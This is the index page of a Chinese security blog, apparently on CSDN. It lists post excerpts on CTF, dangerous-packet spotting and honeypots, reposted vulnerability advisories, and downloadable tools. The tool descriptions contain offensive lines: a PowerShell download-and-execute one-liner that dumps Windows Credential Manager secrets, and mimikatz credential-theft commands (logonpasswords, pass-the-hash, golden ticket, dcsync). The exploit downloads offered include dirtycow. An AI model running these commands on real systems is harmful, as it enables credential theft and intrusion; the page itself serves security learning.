爱国小白帽

更好都不行,我只做最好

  • 博客(459)
  • 资源 (23)
  • 问答 (1)
  • 收藏
  • 关注

原创 攻防演练案例讲溯源

攻防演练的目的是什么?往小了说是为了提高员工网络安全意识,保障客户信息不外泄。往大了说是为了提升国家网络安全实力,保护公民个人信息财产安全。

2022-07-18 16:54:33 2212 1

原创 从CTF比赛真题中学习压缩包伪加密与图片隐写术【文中工具已打包】

先讲个笑话,刚刚打完MAR DASCTF明御攻防赛,一如往常,很轻松便拿到了两个flag(签到与问卷),哈哈,一个脑细胞都不用消耗本文知识点:遇到加密压缩文件怎么办遇到图片隐写的几种验证方法十六进制数据还原文件大佬就不用看了,全是小白操作这是一道misc题,结合了压缩包伪加密与图片隐写技术,我们就以它为例学习一下这两种常见技术的解决方法就是这个压缩文件,后面带*说明需要密码,但是题中没有任何密码提示,ctf中不可能让你无脑爆破,因为时间是有限的,但也有可能是弱口令,反正无从下手先爆破一

2021-03-29 11:46:37 5573 11

原创 【防守方基础】危险报文识别

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有信息泄露类这种情况是最常见的,也是最难以捕获的,因为它也许不用攻击数据就能轻易获取,尤其是报错或探针页面,配置不当可能泄露很多东西别看它危害小,但往往某个不起眼的信息就可以改变战局命令执行类此类攻击多以echo、curl、wget、cd、ping、cat、ls等命令出现,还是很好辨认的在GET参数中执行命令在POST.

2021-03-10 15:56:41 6672 21

原创 HoneyDrive_3蜜罐系统的安装部署及使用指南

HoneyDrive是主要的蜜罐Linux发行版。它是安装了Xubuntu Desktop 12.04.4 LTS版的虚拟设备(OVA)。它包含10多个预安装和预配置的蜜罐软件包,例如Kippo SSH蜜罐,Dionaea和Amun恶意软件蜜罐,Honeyd低交互蜜罐,Glastopf Web蜜罐和Wordpot,Conpot SCADA / ICS蜜罐,Thug和PhoneyC honeyclients等。此外,它包括许多有用的预配置脚本和实用程序,以分析,可视化和处理它可以捕获的数据,例如Kipp.

2021-01-27 13:32:31 5298 22

原创 30余种加密编码类型的密文特征分析(建议收藏)

一、md5一般MD5值是32位由数字“0-9”和字母“a-f”所组成的字符串,如图。如果出现这个范围以外的字符说明这可能是个错误的md5值,就没必要再拿去解密了。16位值是取的是8~24位。md5的三个特征:确定性:一个原始数据的MD5值是唯一的,同一个原始数据不可能会计算出多个不同的MD5值。碰撞性:原始数据与其MD5值并不是一一对应的,有可能多个原始数据计算出来的MD5值是一样的,这就是碰撞。不可逆:也就是说如果告诉你一个MD5值,你是无法通过它还原出它的原始数据的,这不是你的技术不够牛,

2020-11-11 18:53:01 37281 20

原创 网络安全相关行业必备网站(持续更新中)

更新时间:2020年10月22日11:37:29更新内容:更新了码农常用工具直达目录信息收集类搜索引擎指纹识别whois查询子域名爆破端口扫描综合查询身份信息泄露查询威胁情报C段查询:[webscan.cc](https://webscan.cc)加密解密类md5base64站长工具:[tool.chinaz.com](http://tool.chinaz.com/Tools/Unicode.aspx)零宽隐写:[yuanfux.github.io](https://yuanfux.github.i.

2020-10-14 16:16:13 7255 13

原创 企业级内网的域控环境搭建3万字详细部署教程

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理实验环境:环境搭建:模拟实验:...

2020-03-29 14:21:00 6000 12

原创 企业级内网环境搭建2万字详细教程

简单说明:环境需要四台虚拟机,每一台分别充当企业内不同的功能分区,在真实环境中的配置还需视情况自行更改内网搭建示意图目录指南所需设备:内网环境搭建:pfSense安装及使用说明基本安装过程主机端配置过程浏览器端安装过程测试主机之间的连通情况修改各服务器的IP配置检测网络连通情况设置dhcp为办公区分配IP更改防火墙规则只允许办公区上网设置防火墙规则允许全部机器上网设置防火墙规则使外网能访...

2020-03-25 21:18:40 8550 29

原创 一个简单的bat脚本便可实现局域网所有存活IP的精准扫描

此脚本的扫描可在几秒钟之内完成脚本内容无需更改,如下:@echo offFOR /L %%I in (1,1,255) do ping 192.168.1.%%I -n 1 -w 100arp -a >C:\Users\Administrator\Desktop\1.txtexit保存后双击执行就会出现1.txt文件,里面会出现所有存活主机的IP...

2020-03-23 23:45:34 3507 2

原创 【专题文章导航】本篇收录了SQL注入、漏洞复现、后渗透、新增漏洞报告四个专题的所有文章

SQL注入篇漏洞复现篇新增漏洞报告mysql 联合查询注入文件上传之js绕过【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告对information_schema数据库的解析文件上传之mime绕过【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告盲注iis6.0解析漏洞......

2020-03-07 11:54:33 1754 2

转载 PHITHON的公开漏洞 | 绝大部分php探针存在xss漏洞

转载自:https://bugs.leavesongs.com/研究了一下市面上的php探针,发现同源现象较严重。首先发现了php雅黑探针(可以说是国内用的最多的探针了)的一些安全问题,由此各种php探针都躺枪了。就算非同源的php探针往往也容易出现这个问题,这里会给出一些例子。该问题影响范围较广,LNMP、WDCP等linux面板由于自带探针、UPUPW面板也自带探针,所以都躺枪了。简单搜集了一下,影响的探针不止有以下这些:php雅黑探针UenuProbe探针UPUPW PHP 探针B-Ch

2021-08-10 14:22:42 912

转载 Apple任意代码执行漏洞通告

报告编号:B6-2021-072701报告来源:360CERT报告作者:360CERT更新日期:2021-07-270x01 漏洞简述2021年07月27日,360CERT监测发现Apple发布了macOS、iOS、iPadOS远程代码执行漏洞的风险通告,漏洞编号为CVE-2021-30807,漏洞等级:高危,漏洞评分:8.5。macOS、iOS、iPadOS是Apple公司的操作系统,在全球拥有庞大的用户基数。这些操作系统中的IOMobileFrameBuffer内核拓展中存在一处任意代码.

2021-07-27 16:17:46 561

转载 Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析

0x00 前言近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。0x01 漏洞复现这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分析都是基..

2021-07-09 18:46:49 11824

转载 漏洞情报 | WordPress ProfilePress插件多个严重漏洞

​点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述WordPress ProfilePress(原 WP User Avatar)是一个轻量级会员插件,可用于创建用户画像、会员目录和用于用户注册、登录、密码重置及用户信息编辑的前端表单。360漏洞云监测到WordPress ProfilePress插件存在多个严重漏洞。CVE-2021-34621 特权提升漏洞在用户注册过程中,攻击者可通过提供任意用户元数据实现权限提升。CVE-2021-34622 特权提升漏洞在用户画

2021-07-07 23:31:06 759

转载 CVE-2021-35464: ForgeRock AM远程代码执行漏洞通告

报告编号:B6-2021-063002报告来源:360CERT报告作者:360CERT更新日期:2021-06-300x01 漏洞简述2021年06月30日,360CERT监测发现portswigger发布了ForgeRock AM远程代码执行漏洞的漏洞分析报告,漏洞编号为CVE-2021-35464,漏洞等级:严重,漏洞评分:9.8。ForgeRock AM是一个开源的访问管理、权限控制平台,在大学、社会组织中存在广泛的应用。未经身份验证的攻击者可以通过构造特殊的请求远程执行任意代码,并接.

2021-07-06 16:09:42 692

转载 【在野利用|PoC公开】CVE-2020-3580: Cisco ASA安全软件XSS漏洞通告

报告编号:B6-2021-063001报告来源:360CERT报告作者:360CERT更新日期:2021-06-300x01 漏洞简述2021年06月30日,360CERT监测发现Cisco于6月28日发布了 思科自适应安全软件(ASA)和Firepower威胁防御(FTD)软件在野漏洞活跃的风险通告,漏洞编号为CVE-2020-3580,漏洞等级:中危,漏洞评分:6.1`。Cisco ASA软件、FTD软件是运行在Cisco设备上的通用软件,主要用于服务用户防御和监控网络内部的攻击。Ci.

2021-07-06 16:08:24 581

转载 CVE-2021-30116: Kaseya VSA 远程代码执行漏洞通告

报告编号:B6-2021-070601报告来源:360CERT报告作者:360CERT更新日期:2021-07-060x01 漏洞简述2021年07月06日,360CERT监测发现Kaseya发布了VSA管理软件的风险通告,漏洞等级:严重,漏洞评分:9.8。Kaseya VSA是一款企业用于集中IT管理的软件。分为管理端和用户端,管理端可以批量的控制用户端设备,例如在用户端设备上执行命令、执行脚本、开启/关闭电源等。根据其官方通告以及监测到的REvil利用VSA漏洞的勒索事件,VSA软件中.

2021-07-06 16:06:33 1996

转载 【EXP已验证】CVE-2021-34527: Windows Print Spooler 蠕虫级远程代码执行0day漏洞通告

报告编号:B6-2021-062902报告来源:360CERT报告作者:360CERT更新日期:2021-07-021更新概览1.漏洞简述新增360CERT对CVE-2021-34527(PrintNightmare)的研判2.漏洞详情新增相关验证截图2漏洞简述2021年06月29日,360CERT监测发现安全研究人员在GitHub上公开了Windows Print Spooler 蠕虫级远程代码执行0day漏洞的EXP,漏洞等级:严重,漏洞评分:10.0。Windows Print

2021-07-02 14:43:26 1109

转载 零日漏洞 | 微软披露最新 Windows Print Spooler 远程代码执行漏洞(CVE-2021-34527)

​点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。360漏洞云监测到微软最新披露了一个新的Windows Print Spooler远程代码执行漏洞(CVE-2021-34527),微软已知该漏洞存在在野利用。该漏洞目前为零日状态,微软暂未发布修复。该漏洞源于Windows Print Spooler服务执行特权文件操作不当,攻击者可利用该漏洞以系统权限运行任意代码。攻击者可以安装

2021-07-02 14:41:55 841

转载 【POC公开】CVE-2021-1675: Windows Print Spooler远程代码执行漏洞通告

报告编号:B6-2021-062902报告来源:360CERT报告作者:360CERT更新日期:2021-06-290x01 漏洞简述2021年06月29日,360CERT监测发现安全研究人员在GitHub上公开了Windows Print Spooler远程代码执行漏洞的POC,漏洞编号为CVE-2021-1675,漏洞等级:严重,漏洞评分:7.8。Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddP.

2021-06-30 11:50:29 462

转载 CVE-2021-21871: PowerISO 内存越界写漏洞通告

报告编号:B6-2021-062903报告来源:360CERT报告作者:360CERT更新日期:2021-06-290x01 漏洞简述2021年06月29日,360CERT监测发现Cisco Talos发布了PowerISO内存越界漏洞的风险通告,漏洞编号为CVE-2021-21871,漏洞等级:高危,漏洞评分:8.8。PowerISO是Windows下热门的光盘镜像处理软件。可以便捷的对镜像文件进行编辑和加密等操作。PowerISO作为用户级应用软件,攻击者能便利的利用漏洞入侵用户个人计.

2021-06-30 11:49:37 348

转载 CVE-2021-35464: ForgeRock AM远程代码执行漏洞通告

报告编号:B6-2021-063002报告来源:360CERT报告作者:360CERT更新日期:2021-06-300x01 漏洞简述2021年06月30日,360CERT监测发现portswigger发布了ForgeRock AM远程代码执行漏洞的漏洞分析报告,漏洞编号为CVE-2021-35464,漏洞等级:严重,漏洞评分:9.8。ForgeRock AM是一个开源的访问管理、权限控制平台,在大学、社会组织中存在广泛的应用。未经身份验证的攻击者可以通过构造特殊的请求远程执行任意代码,并接.

2021-06-30 11:48:11 504

转载 【在野利用|PoC公开】CVE-2020-3580: Cisco ASA安全软件XSS漏洞通告

报告编号:B6-2021-063001报告来源:360CERT报告作者:360CERT更新日期:2021-06-300x01 漏洞简述2021年06月30日,360CERT监测发现Cisco于6月28日发布了 思科自适应安全软件(ASA)和Firepower威胁防御(FTD)软件在野漏洞活跃的风险通告,漏洞编号为CVE-2020-3580,漏洞等级:中危,漏洞评分:6.1`。Cisco ASA软件、FTD软件是运行在Cisco设备上的通用软件,主要用于服务用户防御和监控网络内部的攻击。Ci.

2021-06-30 11:47:05 347

转载 漏洞情报 | Trend Micro Password Manager 多个高危漏洞

​点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述Trend Micro Password Manager是美国趋势科技(Trend Micro)公司的一套安全的密码管理解决方案。360漏洞云监测到 Trend Micro Password Manager 存在多个高危漏洞。CVE-2021-32461 特权提升漏洞该漏洞源于整型截断,非特权的本地攻击者可利用漏洞触发缓冲区溢出,从而实现权限提升。CVE-2021-32462 远程代码执行漏洞该漏洞源于危险函数的暴露,非

2021-06-29 18:58:30 457

转载 漏洞情报 | Windows Print Spooler 远程代码执行漏洞(CVE-2021-1675)POC公开

​点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。微软在2021年6月的安全更新中修复了一处 Windows Print Spooler 远程代码执行漏洞(CVE-2021-1675)。今天,360漏洞云监测到安全研究人员公布了该漏洞的POC。该漏洞源于Windows Print Spooler未能正确地实施安全限制,攻击者可绕过RpcAddPrinterDriver的安全检查,在

2021-06-29 18:57:37 1285

转载 【POC公开】CVE-2021-1675: Windows Print Spooler远程代码执行漏洞通告

**赶紧点击上方话题进行订阅吧!**报告编号:B6-2021-062902报告来源:360CERT报告作者:360CERT更新日期:2021-06-291漏洞简述2021年06月29日,360CERT监测发现安全研究人员在GitHub上公开了Windows Print Spooler远程代码执行漏洞的POC,漏洞编号为CVE-2021-1675,漏洞等级:严重,漏洞评分:7.8。Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可

2021-06-29 16:12:07 1124

转载 【漏洞通告】Windows 内核信息泄漏漏洞CVE-2021-31955

漏洞名称 : Windows 内核信息泄漏漏洞组件名称 : Windows影响范围 :Windows 10 21h1/20h2/1809/1909/2004Windows Server 2016 20h2/2004Windows Server 2019漏洞类型 : 信息泄漏利用条件 :1、用户认证:不需要用户认证2、触发方式:远程综合评价 :1、用户认证:不需要用户认证2、触发方式:本地漏洞分析1 组件****介绍Microsoft Windows操作系统是美国微软公司研发的一

2021-06-29 16:07:14 2163

转载 CVE-2021-32462: Trend Micro密码管理器远程代码执行漏洞通告

报告编号:B6-2021-062901报告来源:360CERT报告作者:360CERT更新日期:2021-06-290x01 漏洞简述2021年06月29日,360CERT监测发现趋势科技发布了密码管理器安全更新的风险通告,漏洞编号为CVE-2021-32461,CVE-2021-32462,漏洞等级:高危,漏洞评分:8.8。趋势科技Windows密码管理器存在远程代码执行漏洞,攻击者可以利用该漏洞在以 SYSTEM(最高权限)执行任意代码,并接管用户计算机。对此,360CERT建议广大用.

2021-06-29 11:24:54 450

转载 CVE-2021-34824: Istio 敏感信息窃取漏洞通告

报告编号:B6-2021-062804报告来源:360CERT报告作者:360CERT更新日期:2021-06-280x01 漏洞简述2021年06月28日,360CERT监测发现Istio发布了SECURITY-2021-007的风险通告,漏洞编号为CVE-2021-34824,漏洞等级:严重,漏洞评分:9.1。Istio是运行在 k8s 容器服务上的一套软件。Istio 是一种服务网格,是一种现代化的服务网络层,它提供了一种透明、独立于语言的方法,以灵活且轻松地实现应用网络功能自动化。.

2021-06-28 19:08:33 617

转载 西部数据NAS设备网络攻击通告

报告编号:B6-2021-062805报告来源:360CERT报告作者:360CERT更新日期:2021-06-280x01 事件描述2021年06月28日,360CERT监测发现Western Digital发布了Recommended Security Measures for WD My Book Live and WD My Book Live Duo的通告。西部数据已经确定,该公司的 My Book Live 设备遭到了攻击者的入侵,这种入侵会导致设备被恢复出厂设置,数据也被全部擦除.

2021-06-28 19:07:52 452

转载 OpenEXR多个高危漏洞通告

**赶紧点击上方话题进行订阅吧!**报告编号:B6-2021-062802报告来源:360CERT报告作者:360CERT更新日期:2021-06-281漏洞简述2021年06月28日,360CERT监测发现OpenEXR发布了多个高危漏洞安全更新的风险通告,漏洞编号为CVE-2021-20296等,漏洞等级:高危,漏洞评分:8.5。OpenEXR是专业领域的一种图像格式,是一种开放标准的高动态范围图像格式,在计算机图形学里被广泛用于存储图像数据。OpenEXR这种格式多被用于专业图像领

2021-06-28 16:00:03 351

转载 【PoC公开】CVE-2021-27850: Tapestry 序列化漏洞通告

**赶紧点击上方话题进行订阅吧!**报告编号:B6-2021-062803报告来源:360CERT报告作者:360CERT更新日期:2021-06-281漏洞简述2021年06月28日,360CERT监测发现kahla-sec公开了CVE-2021-27850漏洞的利用程序,漏洞编号为CVE-2021-27850,漏洞等级:高危,漏洞评分:7.5。对此,360CERT建议广大用户及时将``升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。2风险等级360CERT

2021-06-28 15:57:28 1026

转载 【漏洞通告】Apache Dubbo多个高危漏洞(CVE-2021-25641等)

2021年6月24日,阿里云应急响应中心监测到国外安全研究人员披露Apache Dubbo多个高危漏洞详情。01漏洞描述Apache Dubbo是一款应用广泛的Java RPC分布式服务框架。2021年6月24日,国外安全研究人员披露Apache Dubbo多个高危漏洞详情:CVE-2021-25641 中,攻击者可利用其他协议绕过Hessian2黑名单造成反序列化。CVE-2021-30179 中,Apache Dubbo Generic filter存在过滤不严,攻击者可构造恶意请求调用恶意方

2021-06-24 11:31:11 1427

转载 漏洞情报 | Sonatype Nexus Repository Manager 目录遍历漏洞

​点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述Sonatype Nexus Repository Manager 是美国Sonatype公司的一款仓库管理器。360漏洞云监测到 Sonatype Nexus Repository Manager 3.x 系列 3.31.0 之前的版本存在目录遍历漏洞(CVE-2021-34553)。经认证的远程攻击者可在未被授予访问权限的情况下获取blob文件清单,并通过构造一个GET请求读取blob文件内容,造成信息泄露。0x02 危害等级中

2021-06-24 09:36:21 659

转载 漏洞情报 | iPhone WiFi模块崩溃漏洞

​点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述iPhone是苹果公司研发的智能手机,搭载苹果公司研发的iOS操作系统。360漏洞云监测到iPhone存在WiFi模块崩溃漏洞。该漏洞源于字符串格式化,攻击者可通过创建特殊名称的WiFi热点,诱导用户连接,从而发起DDoS攻击,造成iPhone手机的WiFi模块崩溃,无法再次启用。0x02 危害等级低危0x03 漏洞复现360漏洞云已于第一时间复现该漏洞,演示如下:0x04 影响版本iOS <= 14.60x05

2021-06-24 09:35:35 233

转载 漏洞情报 | Google Chrome 发布安全更新,修复多个高危漏洞

​点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述Google Chrome 浏览器是一个由 Google(谷歌) 公司开发的网页浏览器。360漏洞云监测到谷歌于2021年6月18日(北京时间)发布了Chrome的安全更新。本次更新共修复了4个高危漏洞,其中CVE-2021-30554已知存在在野利用。CVE-2021-30554漏洞类型:释放后重用漏洞等级:高危描述:该漏洞源于Chrome WebGL组件内的一个释放后重用错误。远程攻击者可创建一个特殊构造的网

2021-06-24 09:34:01 282

转载 漏洞情报 | VMware Tools、VMRC 及 VMware App Volumes 本地提权漏洞

点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述VMware Tools 是美国威睿(VMware)公司的一套VMware虚拟机自带的增强工具,它是VMware提供的用于增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。VMware Remote Console (VMRC) 是一个独立控制台应用程序,可用于连接到客户端设备并在远程主机上打开虚拟机控制台。VMware App Volume 是一组应用和用户管理解决方案,提供了一个通过虚拟磁盘将应用程序交付到桌面的系统 。3

2021-06-24 09:33:01 535

转载 漏洞情报 | VMware Carbon Black App Control 身份认证绕过漏洞

点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述VMware Carbon Black Cloud Workload是一种软件即服务(SaaS)解决方案,提供下一代反病毒(NGAV)、端点检测和响应(EDR)、高级威胁搜索和漏洞管理,使用单个传感器在单个控制台中实现。360漏洞云监测到 VMware Carbon Black App Control 存在身份认证绕过漏洞(CVE-2021-21998)。该漏洞源于处理身份认证请求时的一个错误,远程攻击者可利用该漏洞绕过身份认证,获得对应用

2021-06-24 09:32:17 613

转载 漏洞情报 | PHPMailer 多个远程代码执行漏洞

​点击上方 订阅话题 第一时间了解漏洞威胁0x01 漏洞描述PHPMailer是一个用于发送电子邮件的PHP类库。2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞。CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。CVE-2021-3603:该该漏洞源

2021-06-18 20:25:50 266

转载 漏洞情报 | Fancy Product Designer插件未授权文件上传和远程代码执行漏洞(CVE-2021-24370)

0x01 漏洞描述Fancy Product Designer是WordPress、WooCommerce和Shopify的一个可视化产品配置插件,它允许客户使用自己的图形和内容定制产品。据统计,Fancy Product Designer已在超过 17,000 个网站上安装使用。2021年6月4日,360漏洞云监测到安全研究人员披露了Fancy Product Designer插件未授权文件上传和远程代码执行漏洞(CVE-2021-24370),攻击者成功利用该漏洞后,可以绕过恶意文件上传的检查,并

2021-06-05 13:53:09 338

PEiD0.95.zip

PE iDentifier v0.95 (2008.10.21) by snaker, Qwerton, Jibz & xineohP ------------------------------------------------------ PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 600 different signatures in PE files. PEiD is special in some aspects when compared to other identifiers already out there! 1. It has a superb GUI and the interface is really intuitive and simple. 2. Detection rates are amongst the best given by any other identifier. 3. Special scanning modes for *advanced* detections of modified and unknown files. 4. Shell integration, Command line support, Always on top and Drag'n'Drop capabilities. 5. Multiple file and directory scanning with recursion. 6. Task viewer and controller. 7. Plugin Interface with plugins like Generic OEP Finder and Krypto ANALyzer. 8. Extra scanning techniques used for even better detections. 9. Heuristic Scanning options. 10. New PE details, Imports, Exports and TLS viewers 11. New built in quick disassembler. 12. New built in hex viewer. 13. External signature interface which can be updated by the user. There are 3 different and unique scanning modes in PEiD. The *Normal Mode* scans the PE files at their Entry Point for all documented signatures. This is what all other identifiers also do. The *Deep Mode* scans the PE file's Entry Point containing section for all the documented signatures. This ensures detection of around 80% of modified and scrambled files. The *Hardcore Mode* does a complete scan of the entire PE file for the documented signatures. You should use this mode as a last option as the small signatures often tend to occur a lot in many files and so erroneous outputs may result. The scanner's inbuilt scanning techniques have error control methods which generally ensure correct outputs even if the last mode is chosen. The first two methods produce almost instantaneous outputs but the last method is a bit slow due to obvious reasons! Command line Options -------------------- PEiD now fully supports commandline parameters. peid -time // Show statistics before quitting peid -r // Recurse through subdirectories peid -nr // Don't scan subdirectories even if its set peid -hard // Scan files in Hardcore Mode peid -deep // Scan files in Deep Mode peid -norm // Scan files in Normal Mode peid <file1> <file2> <dir1> <dir2> You can combine one or more of the parameters. For example. peid -hard -time -r c:\windows\system32 peid -time -deep c:\windows\system32\*.dll Task Viewing / Control Module ----------------------------- You can scan currently running tasks with PEiD. The files are scanned from memory. Processes can also be terminated. You can also optionally dump a module and scan the dumped image. You can also view all dependant modules of the processes. Multiple File Scan Module ------------------------- You can scan multiple files at one go with PEiD. Just drag and drop the files on the PEiD main dialog and the Multiple File Scan Dialog will popup displaying the results. You can keep dragging and dropping files onto this dialog as well. It also offers you to choose from the different scanning modes and optionally load a single file in PEiD. It allows you to skip the non PE files so that the list looks clean. You can also scan the contents of a directory choosing files of custom extension if required. MFS v0.02 now supports recursive directory scanning. Disassembler Module ------------------- You can have a quick disassembly of the file loaded in PEiD. Double click to follow JMPs and CALLs and use the Back button to trace back to the original positions. You can copy disassembled output to the clipboard. A new CADT core with custom String Reference Finder has been cooked up. CADT is coded by Ms-Rem. Hex Viewer Module ------------------- You can have a quick hex view of the file loaded in PEiD. A modified version of 16Edit by y0da is used for this purpose. We intend to update the signatures quite often to keep pace with this ever evolving scene :) Please report bugs, ideas, new signatures or packer info to: pusher -> sir.pusher(at)gmail(dot)com ( Administration / Coder ) snaker -> snaker(at)myrealbox(dot)com Jibz -> peid(at)ibsensoftware(dot)com Qwerton -> qwaci(at)gmx(dot)net ALL SUGGESTIONS, IDEAS, BUG REPORTS AND CRITICS ARE WELCOME. History ------- 0.7 Beta -> First public release. 0.8 Public -> Added support for 40 more packers. OEP finding module. Task viewing/control module. GUI changes. General signature bug fixes. Multiple File and Directory Scanning module. 0.9 Recode -> Completely recoded from scratch. New Plugin Interface which lets you use extra features. Added more than 130 new signatures. Fixed many detections and general bugs. 0.91 Reborn -> Recoded everything again. New faster and better scanning engine. New internal signature system. MFS v0.02 now supports Recursive Scanning. Commandline Parser now updated and more powerful. Detections fi

2020-07-27

Advanced_IP_Scanner IP扫描工具

Advanced_IP_Scanner IP扫描工具

2020-04-03

mimikatz,ms14068

mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes). If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases Quick usage log privilege::debug sekurlsa sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd kerberos kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local Build mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: - for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =) Synchronize! - GIT URL is : https://github.com/gentilkiwi/mimikatz.git - SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk - ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip Build the solution - After opening the solution, Build / Build Solution (you can change architecture) - mimikatz is now built and ready to be used! (Win32 / x64) - you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. ddk2003 With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies) For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. Follow instructions: - http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme - http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader Licence CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/ Author - Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync function in lsadump module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) This is a personal development, please respect its philosophy and don't use it for bad things!

2020-04-02

Invoke-WCMDump结合powershell进行密码获取

Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"

2020-03-26

dirtycow脏牛linux提权exp

dirtycow脏牛linux提权exp

2020-03-25

华军1433mssql数据库弱口令扫描工具

华军1433mssql数据库弱口令扫描工具

2020-03-25

tunna实用工具

tunna实用工具

2020-03-25

hash密码抓取工具大全

hash密码抓取提取密码工具大全

2020-03-25

扫描工具大合集,包括代理、IP、端口、目录等扫描

扫描工具大合集,包括代理、IP、端口、目录等扫描

2020-03-25

CentOS 5.5提权exp

CentOS 5.5提权exp

2020-03-20

QuarksPwDump_v0.1.zip

